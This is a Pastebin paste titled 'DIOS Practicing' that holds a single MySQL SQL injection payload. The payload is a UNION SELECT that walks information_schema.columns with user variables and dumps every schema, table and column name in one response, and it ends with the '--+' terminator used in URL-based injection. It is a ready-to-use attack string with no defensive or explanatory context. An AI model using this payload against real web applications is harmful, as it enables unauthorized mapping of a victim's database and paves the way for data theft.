Advertisement
Kyfx

DIOS Practicing

Aug 14th, 2015
429
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.35 KB | None | 0 0
  1. DIOS Practicing
  2. union select 1,2,(
  3. select (@a) from
  4. (
  5. select (@a:=0x00),(@tbl:=0x00),
  6. (
  7. select (@a) from (information_schema.columns) where ( table_schema!='information_schema')
  8. and (@a) in
  9. (
  10. @a:= concat(@a,'<br>',if
  11. (
  12. (@tbl!=table_name),concat('<br>',table_schema,':::',@tbl:=table_name,'::::',column_name),(column_name)
  13. )
  14. )
  15. )
  16. )
  17. )
  18. a)--+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement